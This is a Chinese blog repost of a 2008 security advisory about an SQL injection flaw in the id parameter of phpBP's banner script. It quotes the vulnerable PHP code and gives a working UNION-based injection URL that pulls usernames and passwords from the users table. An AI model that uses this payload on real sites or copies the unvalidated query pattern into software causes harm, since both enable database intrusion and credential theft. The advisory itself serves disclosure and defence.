细水 2008.03.19

漏洞播报

phpBP id参数远程SQL注入漏洞

发布日期:2008-03-17
更新日期:2008-03-18

受影响系统:

PHP BP Team phpBP

描述:


BUGTRAQ  ID: 28272

PHPBP是在波兰广泛使用的网站内容管理系统。

PHPBP的includes/functions/banners-external.php脚本文件中没有正确地验证对id参数的输入,允许远程攻击者通过提交特制的SQL查询请求执行SQL注入攻击。

以下是有漏洞的代码段:


3   function banner_out() //zlicza ilosc klikniec na banner
4   {
5    global $conf;
6
7    if($_GET[‘id’])
8    {
9     SQLvalidate($_POST[‘id’]);
10
11    $db = new dbquery;
12    $db->query("Select * FROM $conf[prefix]banners Where id=$_GET[id]") or $db->err(__FILE__, __LINE__);
13
14    if($db->num_rows()==0)
15    {
16     redirect(‘index.php?module=error?error=banners_error2’);
17     exit;
18    }
19
20    $d=$db->fetch_object();
21    $db->query("Update $conf[prefix]banners SET views=views+1 Where id=’$_GET[id]’") or $db->err(__FILE__, __LINE__);
22
23    redirect($d->url);
24   }
25
26   exit;
27  }

<*来源:irk4z (irk4z@yahoo.pl
  
  链接:http://secunia.com/advisories/29411/
*>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://[host]/[path]/index.php?function=banner_out&id=10000/**/LIMIT/**/0/**/UNION/**/Select/**/1,2,concat(0x687474703A2F2F,login,0x5F,pass),4,5,6,7,8,9/**/FROM/**/phpbp_users/**/LIMIT/**/1/*

建议:


厂商补丁:

PHP BP Team
———–
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.phpbp.com/index.php?module=download


您可以随意转载,但必须在显著位置标明 原创链接 和本 版权声明

本文链接: http://www.mcafeefans.com/?p=2503

发表评论

电子邮件地址不会被公开。

:wink: :twisted: :roll: :mrgreen: 8) :-D :arrow: :-o more »

返回页首返回页尾